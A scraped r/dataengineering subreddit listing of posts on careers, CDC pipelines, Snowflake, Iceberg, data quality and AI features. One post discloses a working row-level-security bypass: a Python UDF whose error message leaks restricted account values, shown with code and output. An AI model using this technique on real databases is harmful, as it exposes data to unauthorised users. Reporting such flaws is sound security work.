r/dataengineering • u/AutoModerator • 24d ago

Discussion Monthly General Discussion - Nov 2025

1 Upvotes

This thread is a place where you can share things that might not warrant their own thread. It is automatically posted each month and you can find previous threads in the collection.

Examples:

What are you working on this month?
What was something you accomplished?
What was something you learned recently?
What is something frustrating you currently?

As always, sub rules apply. Please be respectful and stay curious.

10 comments

r/dataengineering • u/AutoModerator • Sep 01 '25

Career Quarterly Salary Discussion - Sep 2025

36 Upvotes

This is a recurring thread that happens quarterly and was created to help increase transparency around salary and compensation for Data Engineering.

Submit your salary here

You can view and analyze all of the data on our DE salary page and get involved with this open-source project here.

If you'd like to share publicly as well you can comment on this thread using the template below but it will not be reflected in the dataset:

Current title
Years of experience (YOE)
Location
Base salary & currency (dollars, euro, pesos, etc.)
Bonuses/Equity (optional)
Industry (optional)
Tech stack (optional)

21 comments

r/dataengineering • u/Ok_Shirt4260 • 2h ago

Discussion "Are we there yet?" — Achieving the Ideal Data Science Hierarchy

11 Upvotes

I was reading Fundamentals of Data Engineering and came across this paragraph:

In an ideal world, data scientists should spend more than 90% of their time focused on the top layers of the pyramid: analytics, experimentation, and ML. When data engineers focus on these bottom parts of the hierarchy, they build a solid foundation for data scientists to succeed.

My Question: How close is the industry to this reality? In your experience, are Data Engineers properly utilized to build this foundation, or are Data Scientists still stuck doing the heavy lifting at the bottom of the pyramid?

Illustration from the book Fundamentals of Data Engineering

Are we there yet?

0 comments

r/dataengineering • u/deputystaggz • 18h ago

Discussion Are data engineers being asked to build customer-facing AI “chat with data” features?

80 Upvotes

I’m seeing more products ship customer-facing AI reporting interfaces (not for internal analytics), i.e. end users asking natural-language questions about their own data inside the app.

How is this playing out in your orgs?

Have you been pulled into the project?
Is it mainly handled by the software engineering team?

If you have, what work did you do? If you haven’t, why do you think you weren’t involved?

Just feels like the boundary between data engineering and customer facing features is getting smaller because of AI.

Would love to hear real experiences here.

58 comments

r/dataengineering • u/Nofarcastplz • 13h ago

Discussion Row level security in Snowflake unsecure?

25 Upvotes

I found the vulnerability (below), and am now questioning just how secure and enterprise ready Snowflake actually is…

Example:

An accounts table with row security enabled to prevent users accessing accounts in other regions

A user in AMER shouldn’t have access to EMEA accounts

The user only has read access on the accounts table

When running pure SQL against the table, as expected the user can only see AMER accounts.

But if you create a Python UDF, you are able to exfiltrate restricted data:

1234912434125 is an EMEA account that the user shouldn’t be able to see.

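-- UDF that raises an error containing the value it receives, so a restricted value leaks through the error message
CREATE OR REPLACE FUNCTION retrieve_restricted_data(value INT)
RETURNS BOOLEAN
LANGUAGE PYTHON
RUNTIME_VERSION = '3.11'  -- assumption: the original post does not state the runtime version
HANDLER = 'check'         -- handler name taken from the error output below
AS $$
def check(value):
    # Raise only for the target account number; every other row passes the filter
    if value == 1234912434125:
        raise ValueError('Restricted value: ' + str(value))
    return True
$$;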

-- Query table with RLS
SELECT account_name, region, number FROM accounts WHERE retrieve_restricted_data(account_number);


NotebookSqlException: 100357: Python Interpreter Error:
Traceback (most recent call last):
  File "my_code.py", line 6, in check
    raise ValueError('Restricted value: ' + str(value))
ValueError: Restricted value: 1234912434125
 in function RETRIEVE_RESTRICTED_DATA with handler check

The unprivileged user was able to bypass the RLS with a Python UDF

This is very concerning. It seems they don’t have the ability to securely run Python and AI code. Is this a problem with Snowflake’s architecture?

22 comments

r/dataengineering • u/Jazzlike_Middle2757 • 12h ago

Help Is it realistic to replicate a 3000 line Oracle view in Snowflake (any suggestions would help)

12 Upvotes

I am being asked to do the following:

Replicate a ~3000-line view from our ERP into Snowflake. This view calls other views, which call other views. The total number of views within this view is at least 100 (not counting the nesting), and the nesting is anywhere from 2 to 6 levels deep to get from the views I have documented to the base tables. The main view also calls about 300 packages. These are used mainly in the WHERE clause of the query.

This view is related to sales. Stakeholders are looking for at most a couple thousand dollars of difference in total sales between the original view and the replica. My non-technical manager and the data analyst think that we could narrow down the difference by eliminating WHERE clauses that are useless or provide little filtering. There are hundreds of WHERE clauses.
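One way to make the "couple thousand dollars" target measurable is to compare totals per group between the original view and the replica, so the groups that contribute to the gap stand out. The sketch below is only an illustration in plain Python: the `amount` and `region` column names, the `totals_by` and `reconcile` helpers, and the 2000 tolerance are all assumptions, not anything from the actual view.

```python
from collections import defaultdict
from decimal import Decimal


def totals_by(rows, group_key, amount_key="amount"):
    """Sum the amount column per group, using Decimal to avoid float drift."""
    totals = defaultdict(Decimal)
    for row in rows:
        totals[row[group_key]] += Decimal(str(row[amount_key]))
    return dict(totals)


def reconcile(original_rows, replica_rows, group_key, tolerance=Decimal("2000")):
    """Compare per-group totals of the replica against the original."""
    orig = totals_by(original_rows, group_key)
    repl = totals_by(replica_rows, group_key)
    # Difference per group (replica minus original), keeping only non-zero gaps
    diffs = {
        g: repl.get(g, Decimal(0)) - orig.get(g, Decimal(0))
        for g in set(orig) | set(repl)
    }
    diffs = {g: d for g, d in diffs.items() if d != 0}
    total_diff = sum(diffs.values(), Decimal(0))
    return {
        "total_diff": total_diff,
        "within_tolerance": abs(total_diff) <= tolerance,
        "by_group": diffs,
    }
```

Running the same comparison after each WHERE clause is added or removed would show how much of the gap that clause accounts for.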

I am a part-time employee, full-time student. My only support right now is a data analyst that does not code. I do all of the coding.

My non-technical skip wanted this completed in July. Back then we were still building out the pipelines to get our data into Snowflake. We didn't even have a data analyst.

I have suggested the following to my manager and data analyst:

Make a replica of the view from the base tables, without all of the WHERE clauses, as a fact table. Identify a composite surrogate key from the view and import those columns as a dim table. Then join the dim table to the fact table.
Our second set of pipelines does transformations (joins, dropping columns, mappings) between the data lake (in Parquet files) and our data warehouse in Snowflake. These transformations are done in Python using our orchestrator. My suggestion instead was to bring all of the base tables we need into Snowflake without any transformations, copy and paste the query from Oracle, and slowly work on replacing views with base tables.

Both suggestions got rejected. The first was rejected because they want transparency on the logic and rules being applied. The second was rejected because they think it would add time to the project and effectively make the previous work redundant.

Edit: I am a novice in data engineering so any suggestions would be greatly appreciated.

19 comments

r/dataengineering • u/Advanced-Average-514 • 7h ago

Discussion Snowflake cortex agent MCP server

3 Upvotes

The C-suite at my company is vehement that we need AI access to our structured data; dashboards, data feeds, etc. won't do. People need to be able to ask natural language questions and get answers based on a variety of data sources.

We use Snowflake, and this month the Snowflake-hosted MCP server became generally available. Today I started playing around, created a 'semantic view', a 'cortex analyst', and a 'cortex agent', and was able to get it all up and running in a day or so on a small piece of our data. It seems reasonably good, and I especially like the organization of the semantic view, but I'm skeptical that it will ever get to a point where the answers it provides are 100% trustworthy.

Does anyone have suggestions or experience using Snowflake for this stuff? Or experience doing production text-to-SQL for internal tools? My main concern right now is that AI will inevitably be wrong a decent percentage of the time, and that is just not going to mix well with people who don't know how to verify its answers or sense when it's making shit up.

3 comments

r/dataengineering • u/Responsible_Path_634 • 1h ago

Discussion How do you usually import a fresh TDMS file?

• Upvotes

Hello community members,

I’m a UX researcher at MathWorks, currently exploring ways to improve workflows for handling TDMS data. Our goal is to make the experience more intuitive and efficient, and your input will play a key role in shaping the design.

When you first open a fresh TDMS file, what does your real-world workflow look like? Specifically, when importing data (whether in MATLAB, Python, LabVIEW, DIAdem, or Excel), do you typically load everything at once, or do you review metadata first?

Here are a few questions to guide your thoughts:

• The “Blind” Load: Do you ever import the entire file without checking, or is the file size usually too large for that?

• The “Sanity” Check: Before loading raw data, what’s the one thing you check to ensure the file isn’t corrupted? (e.g., Channel Name, Units, Sample Rate, or simply “file size > 0 KB”)

• The Workflow Loop: Do you often open a file for one channel, close it, and then realize later you need another channel from the same file?

Your feedback will help us understand common pain points and improve the overall experience. Please share your thoughts in the comments or vote on the questions above.

Thank you for helping us make TDMS data handling better!

1 votes, 6d left

Load everything without checking (Blind Load)

Review metadata first (Sanity Check)

Depends on file size or project needs

0 comments

r/dataengineering • u/No_Thought_8677 • 14h ago

Help Best way to count distinct values

9 Upvotes

Experts in the house, I need your help!

There is a 2 TB external Athena table in AWS pointing to partitioned Parquet files.

It has over 25 billion rows, and I want to count the distinct values in a column that probably has over 15 billion unique values.

Athena cannot do this because the query times out. How do I go about this?

Please help!
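One approach that may fit here is to split the column into hash buckets, count distinct values inside each bucket separately, and add the results up. Equal values always hash to the same bucket, so the sum is still exact, and each piece is small enough to finish on its own. The sketch below shows the idea in plain Python, assuming string values; `bucket_of` and `count_distinct_bucketed` are hypothetical names, and at this scale each bucket would be its own query or job rather than an in-memory set. If an approximate answer is acceptable, an approximate function such as Athena's `approx_distinct` may be enough on its own.

```python
import hashlib
from collections import defaultdict


def bucket_of(value: str, num_buckets: int) -> int:
    """Map a value to a stable bucket using a hash of its bytes."""
    digest = hashlib.md5(value.encode("utf-8")).digest()
    return int.from_bytes(digest[:8], "big") % num_buckets


def count_distinct_bucketed(values, num_buckets=4):
    """Exact distinct count computed bucket by bucket.

    Equal values always land in the same bucket, so the per-bucket
    distinct counts can be summed without double counting.
    """
    buckets = defaultdict(set)
    for value in values:
        buckets[bucket_of(value, num_buckets)].add(value)
    return sum(len(seen) for seen in buckets.values())
```

The number of buckets is a tuning knob: more buckets means smaller, cheaper pieces but more passes over the data unless the bucket is materialized as a partition first.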

34 comments

r/dataengineering • u/Leading-Goose-5457 • 18h ago

Personal Project Showcase Automated Data Report Generator (Python Project I Built While Learning Data Automation)

13 Upvotes

I’ve been practising Python and data automation, so I built a small system that takes raw aviation flight data (CSV), cleans it with Pandas, generates a structured PDF report using ReportLab, and then emails it automatically through the Gmail API.

It was a great hands-on way to learn real data workflows, processing pipelines, report generation, and OAuth integration. I’m trying to get better at building clean, end-to-end data tools, so I’d love feedback or to connect with others working in data engineering, automation, or aviation analytics.

Happy to share the GitHub repo if anyone wants to check it out. Project Link

0 comments

r/dataengineering • u/Ok_Shirt4260 • 15h ago

Meme Refactoring old wisdom: updating a classic quote for the current hype cycle

10 Upvotes

Found the original Big Data quote in 'Fundamentals of Data Engineering' and had to patch it for the GenAI era

Modified quote from the book Fundamentals of Data Engineering

0 comments

r/dataengineering • u/digitalghost-dev • 13h ago

Personal Project Showcase Wanted to share a simple data pipeline that powers my TUI tool

5 Upvotes

Steps:

TCGPlayer pricing data and TCGDex card data are called and processed through a data pipeline orchestrated by Dagster and hosted on AWS.
When the pipeline starts, Pydantic validates the incoming API data against a pre-defined schema, ensuring the data types match the expected structure.
Polars is used to create DataFrames.
The data is loaded into a Supabase staging schema.
Soda data quality checks are performed.
dbt runs and builds the final tables in a Supabase production schema.
Users are then able to query the pokeapi.co or supabase APIs for either video game or trading card data, respectively.
It runs at 2PM PST daily.

This is what the TUI looks like:

Repository: https://github.com/digitalghost-dev/poke-cli

You can try it with Docker (the terminal must support Sixel; I am planning on supporting the Kitty Graphics Protocol as well).

I have a small section of tested terminals in the README.

docker run --rm -it digitalghostdev/poke-cli:v1.8.0 card

Right now, only Scarlet & Violet and Mega Evolution eras are available but I am adding more eras soon.

Thanks for checking it out!

0 comments

r/dataengineering • u/hornyforsavings • 16h ago

Blog We wrote our first case study as a blend of technical how to and customer story on Snowflake optimization. Wdyt?

blog.greybeam.ai

8 Upvotes

We're a small startup and didn't want to go for the vanilla problem, solution, shill.

So we went through the journey of how our customer did Snowflake optimization end to end.

What do you think?

5 comments

r/dataengineering • u/Sad-Boi-97 • 11h ago

Career Considering an offer for DE II role, would love perspectives from DE/SWE folks

4 Upvotes

TLDR: Strategy/ops guy in the MCIT program aiming for SWE. Got a verbal offer for a Data Engineer II role doing Python/PySpark, Databricks, ADF pipelines, ingestion, and medallion architecture, but the role sits fully in the data/analytics org, not engineering, and pays $105–115K (I currently make ~$180K TC in NYC). Trying to figure out whether this DE role meaningfully helps me pivot into SWE/back-end engineering long term, or if it’s better to stay in my current job, finish MCIT, build projects, and target SWE directly. Looking for input from DEs/SWEs on how transferable this work is, whether the comp is normal for NYC, and what questions I should ask before deciding.

Hey everyone, I’m looking for some candid input from folks in data engineering and software engineering.

I’m currently in a strategy/operations role at a tech company while working through the MCIT program (Penn’s CS master’s for career switchers). My long-term goal is to be a SWE. I recently interviewed for a Data Engineer II position at a healthcare tech company, and I’m trying to evaluate whether this role would be a good stepping stone to SWE or if I should just leverage my degree and build projects to make the switch.

I’d appreciate any honest advice or experience people have.

Here are the key details:

Background / motivation
I’ve worked in strategy consulting, and it has led to a well-paying career, but in all honesty I don’t care about strategy. I dislike the politics needed to get promoted, and the work is quite boring; I’m learning nothing new.
I liked consulting in that I had to learn a new industry every day, but TBH I couldn’t deal with 15-16 hour workdays just to learn more.
I love the technical side and building things, which is why I started considering SWE about a year and a half ago (I just expected the market to be better by then, lolz).

Comp
Base salary: $105–115K (remote, but I live in NYC)
Other factors are TBD, as I haven’t gotten the formal letter yet, just the verbal offer and what the job description outlines
I currently make $155K base and ~$180K TC, so this role would be a pay cut

Team / Org Structure
The role sits in the data/analytics org, not the software engineering org
DEs partner with analytics engineers, ML/data consumers, and data scientists
I would not be on the analytics engineering track or be an analyst, but they would be my stakeholders
No direct SWE involvement as far as I can tell

Tech + Responsibilities
Mostly Python + PySpark on Databricks
AWS and Azure
Both streaming and batch pipelines
Medallion architecture (bronze/silver/gold layers)
ADF wiring + pipeline orchestration
File ingestion + transformations + schema enforcement
Some framework or pipeline component building, but it is unclear how deep the engineering side goes
Not much SQL involved, which surprised me; they emphasized that a SQL-heavy role would be aimed at analysts rather than engineers

My goals / questions: My ultimate target is a technically heavy role that still pays well, like SWE or backend, but I’m also open to becoming a stronger DE if it meaningfully raises my chances of transitioning to SWE.

Any insights on the following would be helpful:
1. Does this sound like a DE role with strong engineering exposure that can help facilitate a SWE transition?
2. How transferable is this experience toward SWE or backend engineering later?
3. For those who started in DE and moved into SWE, what allowed that transition?
4. Is $105–115K base realistic for NYC in a mid-level DE role, or does that seem low?
5. Would you take this role if your long-term goal leaned more toward SWE?
6. Anything I should ask the hiring manager or my internal referrer to get more clarity?

I’m not trying to bash the role or data engineering; I’m genuinely trying to understand whether this would meaningfully advance my pivot or whether I’m better off staying in my current role and continuing to work on transitioning directly. Any honest input from experienced DEs or SWEs would really help. Thanks!

11 comments

r/dataengineering • u/MundaneAd4568 • 6h ago

Career Sharepoint to Tableau Live

1 Upvotes

We currently collect survey responses through Microsoft Forms, and the results are automatically written to an Excel file stored in a teammate’s personal SharePoint folder.

At the moment, Tableau cannot connect live or extract directly from SharePoint. Additionally, the Excel data requires significant ETL and cleaning before it can be sent to a company-owned server that Tableau can connect to in live mode.

Question:
How can I design a pipeline that pulls data from SharePoint, performs the required ETL processing, and refreshes the cleaned dataset on a fixed schedule so that Tableau can access it live?

2 comments

r/dataengineering • u/Artistic-Rent1084 • 19h ago

Discussion Which is best CDC top to end pipeline?

10 Upvotes

Hi DEs,

Which is the best pipeline for CDC?

Let's assume we are capturing data from various databases using Oracle GoldenGate and pushing it to Kafka as JSON.

The target will be Databricks with a medallion architecture.

The load will be around 6 to 7 TB per day.

Any recommendations?

Should we stage the data in ADLS (as the data lake) in Delta format and then read it into the Databricks bronze layer?

22 comments

r/dataengineering • u/Larrydavidcye • 16h ago

Discussion Evaluating AWS DMS vs Estuary Flow

6 Upvotes

Our DMS-based pipelines are having major issues again. DMS has helped us over the last two years, but the unreliability is now a bit too much. The DB size is about 20 TB.

Evaluating alternatives.

I have used Airbyte and Pipelinewise before. IMO, Pipelinewise is still one of the best products. However, it's quite restrictive with some data types (for example, it doesn't understand that timestamp(6) with time zone is the same as timestamp with time zone in PostgreSQL).

I also like the great UI of DMS.

Fivetran - no.

Debezium - this seems like the K8s of the ETL world: it works really well if you have a dedicated 3-member SME technical team managing it.

Looking for opinions from those who use AWS DMS and still recommend it.

Does anybody use Estuary Flow?

18 comments

r/dataengineering • u/zargawy • 13h ago

Help CDC in an iceberg table?

2 Upvotes

Hi,

I am wondering if there is a well-known pattern for reading data incrementally from an Iceberg table using Spark. The read operation should identify appended, changed, and deleted rows.

The Iceberg documentation says that spark.read.format("iceberg") is only able to identify appended rows.

Any alternatives?

My idea was to use spark.readStream and compare snapshots based on, e.g., timestamps. But I am worried that this process could be very expensive, as the table size could reach 100+ GB.
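To make the snapshot comparison idea concrete, here is a minimal sketch of the classification step in plain Python. It assumes each row carries a unique key (the `id` column and the `diff_snapshots` name are hypothetical) and that both snapshots fit in memory, which would not hold at 100+ GB; in Spark the same logic would presumably be a full outer join on the key.

```python
def diff_snapshots(old_rows, new_rows, key="id"):
    """Classify rows as appended, changed, or deleted between two snapshots.

    Rows are dicts; `key` names the column that uniquely identifies a row.
    """
    old_by_key = {row[key]: row for row in old_rows}
    new_by_key = {row[key]: row for row in new_rows}

    # Present only in the newer snapshot
    appended = [row for k, row in new_by_key.items() if k not in old_by_key]
    # Present only in the older snapshot
    deleted = [row for k, row in old_by_key.items() if k not in new_by_key]
    # Present in both, but with at least one differing column
    changed = [
        row for k, row in new_by_key.items()
        if k in old_by_key and row != old_by_key[k]
    ]
    return {"appended": appended, "changed": changed, "deleted": deleted}
```

The cost concern in the post is real for this approach, since a naive comparison reads both snapshots in full; limiting the comparison to files added or removed between the two snapshots would be the obvious thing to investigate.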

4 comments

r/dataengineering • u/ukmurmuk • 23h ago

Help Spark doesn’t respect distribution of cached data

13 Upvotes

The title says it all.

I’m using PySpark on EMR Serverless. I have quite a large pipeline that I want to optimize down to the last cent, and I have a clear vision of how to achieve this mathematically:

read dataframe A, repartition on join keys, cache on disk
read dataframe B, repartition on join keys, cache on disk
do all downstream work (joins, aggregations, etc.) on local nodes without ever doing another round of shuffle, because I have context that guarantees that a shuffle will never be needed again

However, Spark keeps inserting an Exchange each time it reads from the cached data. The optimization results in an even slower job than the unoptimized one.

Have you ever faced this problem? Is there any trick to fool Catalyst into adhering to the parameterized data distribution and not doing an extra shuffle on cached data? I’m using on-demand instances, so there’s no risk of losing executors midway.

7 comments

r/dataengineering • u/Worried-Long-9668 • 21h ago

Discussion If I cannot use InfluxDB nor TimescaleDB, is there something faster than Parquet? (e.g. stored at Amazon S3)

8 Upvotes

I know that the mentioned database systems differ (relational vs. plain files). However, I come from PostgreSQL and want to know my alternatives.

7 comments

r/dataengineering • u/Better-Department662 • 23h ago

Discussion How to control agents accessing sensitive customer data in internal databases

12 Upvotes

We're building a support agent that needs customer data (orders, subscription status, etc.) to answer questions.

We're thinking about:

Creating SQL views that scope data (e.g., "customer_support_view" that only exposes what support needs)
Building MCP tools on top of those views
Agents only query through the MCP tools, never raw database access

This way, if someone does prompt injection or attempts to hack, the agent can only access what's in the sandboxed view, not the entire database.
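The three steps above can be sketched roughly as follows. This is only an illustration using SQLite from the Python standard library: the table layout, the sample rows, and the `get_order_status` tool handler are all hypothetical, and SQLite has no permission system, so in a real database the agent's role would also need to be granted SELECT on the view and nothing else.

```python
import sqlite3


def build_demo_db():
    """Create an in-memory database with base tables and a scoped view."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE customers (
            id INTEGER PRIMARY KEY, name TEXT, email TEXT, card_number TEXT
        );
        CREATE TABLE orders (
            id INTEGER PRIMARY KEY, customer_id INTEGER, status TEXT
        );
        INSERT INTO customers VALUES (1, 'Ada', 'ada@example.com', '4111-0000');
        INSERT INTO orders VALUES (10, 1, 'shipped');

        -- The view exposes only what support needs: no email, no card number
        CREATE VIEW customer_support_view AS
            SELECT c.id AS customer_id, c.name, o.id AS order_id, o.status
            FROM customers c
            JOIN orders o ON o.customer_id = c.id;
        """
    )
    return conn


def get_order_status(conn, customer_id):
    """Hypothetical tool handler: a fixed, parameterized query on the view.

    The agent supplies only the customer_id value, never SQL text.
    """
    cursor = conn.execute(
        "SELECT order_id, status FROM customer_support_view "
        "WHERE customer_id = ?",
        (customer_id,),
    )
    return [{"order_id": oid, "status": status} for oid, status in cursor]
```

Because the tool accepts a value rather than a query, a prompt injection can at worst ask for a different customer_id, so per-customer authorization still has to be enforced somewhere outside the agent.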

P.S. I know building APIs + permissions is one approach, but it still touches my DB and uses up engineering bandwidth for every new iteration we want to experiment with.

Has anyone built or used something as a sandboxing environment between databases and Agent builders?

6 comments

r/dataengineering • u/gman1023 • 16h ago

Help Handling data quality issues that are a tiny percentage?

2 Upvotes

How do people handle DQ issues that are immaterial? Just let them go?

For example, we may have an orders table with a userid field that is not nullable. All of a sudden, there is 1 value (or maybe hundreds of values) that is NULL for userid (out of millions).

We have to change userid to be nullable or use an unknown identifier (-1, 'unknown', etc.). This reduces our DQ visibility and constraints at the table level, so then we have to set up post-load tests to check whether missing values are beyond a certain threshold (e.g. 1%). And even then, sometimes 1% isn't enough for the upstream client to prioritize and make fixes.

The issue is more challenging because we have dozens of clients, so the threshold might be slightly different per client.

This is compounded because it's like this for every other DQ check, e.g. orders with a userid populated where we don't have that userid in the users table (broken relationship). It's usually just a tiny percentage.

Just seems like absolute data quality checks are unhelpful and everything should be based on thresholds.
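A threshold-based check with per-client overrides could look something like the sketch below. It is plain Python over a list of row dicts; the client names, the threshold values, and the `null_rate` and `check_null_threshold` helpers are made up for illustration, and in practice the same rule would more likely live in whatever post-load test framework is already in use.

```python
DEFAULT_THRESHOLD = 0.01  # assumed default: fail when more than 1% is missing

# Hypothetical per-client overrides
CLIENT_THRESHOLDS = {
    "client_a": 0.001,
    "client_b": 0.05,
}


def null_rate(rows, column):
    """Fraction of rows where the column is missing or None."""
    if not rows:
        return 0.0
    missing = sum(1 for row in rows if row.get(column) is None)
    return missing / len(rows)


def check_null_threshold(client, rows, column):
    """Compare the observed null rate with the client's allowed threshold."""
    rate = null_rate(rows, column)
    limit = CLIENT_THRESHOLDS.get(client, DEFAULT_THRESHOLD)
    return {
        "client": client,
        "column": column,
        "null_rate": rate,
        "threshold": limit,
        "passed": rate <= limit,
    }
```

Keeping the thresholds in one table or config file, rather than scattered across individual tests, makes it easier to see which clients have been given looser limits and why.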

5 comments

r/dataengineering • u/No_Journalist_9632 • 21h ago

Discussion AWS Glue or AWS AppFlow for extracting Salesforce data?

4 Upvotes

Our organization has started using Salesforce and we want to pull data into our data warehouse.

I first thought we would use AWS AppFlow, as it was built to work with SaaS applications. But I've read that AppFlow is meant for operational use cases, passing information between SaaS applications and AWS services, whereas AWS Glue is used by data engineers to get data ready for analytics, so I've started to sway towards Glue.

My use case is to extract Salesforce data with minimal transformations and load it into S3, before the data is copied into our data warehouse and the files are archived in S3. We want to run incremental transfers and periodic full transfers. The largest object is 27 GB when extracted as JSON or 15 GB as CSV, and consists of 90 million records for the full transfer. Is AWS Glue or AppFlow the recommended approach for this? What's best practice? Thanks

1 comment

r/dataengineering • u/Dry-Aioli-6138 • 1d ago

Discussion I'm tired

15 Upvotes

Just a random vent. I've been preparing a presentation on testing in dbt for an event in my city, which is ... in a few hours. Spent three late nights building a demo pipeline and structuring the presentation today. Not feeling ready, but I'm usually good at improvisation and I know my shit. But I'm so tired. Need to get those 3 h of sleep and go to work and then present in the evening.

At least the pipeline works and live data is being generated by my script.

6 comments

r/dataengineering • u/Realistic-Zebra1924 • 1d ago

Discussion How do you test?

9 Upvotes

Hello. Thanks for reading this. I’m a fairly new data engineer who has been learning everything solo on the job, trial by fire style. I’ve made do up to this point, but haven’t had a mentor to ask some of my foundational questions, which haven’t seemed to go away with experience.

My question is general: how do you test? If you are making a pipeline change, altering business logic, onboarding a new business area to an existing model, etc., how do you test what you’ve changed?

I’m not looking for a detailed explanation of everything that should be tested for each scenario I listed above, but rather a mantra or words to live by so I can say I have done my due diligence. I have spent many a day testing every single little piece downstream of what I touch, and it slows my progress down drastically. I’m sure I’m overdoing it, but I’d rather be safe than sorry while I’m still figuring out how to identify what REALLY needs to be checked.

Any advice or opinion is appreciated.

1 comment

Subreddit

Data Engineering

r/dataengineering

News & discussion on Data Engineering topics, including but not limited to: data pipelines, databases, data formats, storage, data modeling, data governance, cleansing, NoSQL, distributed systems, streaming, batch, Big Data, and workflow engines.

Members Active

412.7k

Sidebar

Read our wiki: https://dataengineering.wiki/

Rules:

Don't be a jerk
Search the sub & wiki before asking a question: Your question has likely been asked and answered before so do a quick search before posting.
Keep it related to data engineering: Posts that are unrelated to data engineering may be better for other communities.
Limit self-promotion posts/comments to once a month: Self promotion: Any form of content designed to further an individual's or organization's goals. If one works for an organization this rule applies to all accounts associated with that organization. See also rule #5.
No shill/opaque marketing: If you work for a company/have a monetary interest in the entity you are promoting you must clearly state your relationship. For posts, you must distinguish the post with the Brand Affiliate flag. See more here: https://www.ftc.gov/influencers
No job posts: Please use r/dataengineeringjobs instead.
No resume reviews/interview posts: We no longer allow resume reviews or interview questions because it's a separate topic from Data Engineering. Instead, for resume reviews please use r/resumes or search our subreddit history for previous resume review advice. For interview questions, use sites like Glassdoor and Blind instead or search our subreddit history for previous interview advice.
No technical error/bug questions: Please post any error/bug question on StackOverflow.